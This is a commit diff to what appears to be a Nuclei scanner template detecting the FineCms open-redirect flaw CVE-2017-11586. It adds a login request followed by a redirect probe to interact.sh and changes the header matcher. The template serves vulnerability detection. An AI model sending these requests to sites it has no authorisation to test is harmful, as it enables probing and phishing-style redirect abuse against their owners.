Update CVE-2017-11586.yaml

CVE-2017-11586.yaml

@@ -1,29 +1,36 @@
 id: CVE-2017-11586
 
 info:
-  name: dayrui FineCms 5.0.9 - Open redirect
+  name: FineCms < 5.0.9 - Open redirect
   author: 0x_Akoko
   severity: low
-  description: dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action.
+  description: |
+    dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action.
   reference:
     - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
-    - https://www.cvedetails.com/cve/CVE-2017-11586
-    - https://vuldb.com/?id.104434
-  tags: cve,cve2017,redirect,opentext
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-11586
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.10
     cve-id: CVE-2017-11586
-    cwe-id: CWE-601
+  metadata:
+    verified: true
+  tags: cve,cve2017,redirect,finecms
 
 requests:
-  - method: GET
+  - raw:
+      - |
+        POST /index.php?s=member&c=login&m=index HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
-    path:
-      - '{{BaseURL}}/index.php?c=weixin&m=sync&url=http://example.com'
+        back=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1
 
+      - |
+        GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
     matchers:
       - type: regex
-        regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
         part: header
+        regex:
+          - 'Refresh:(.*)url=http:\/\/interact\.sh'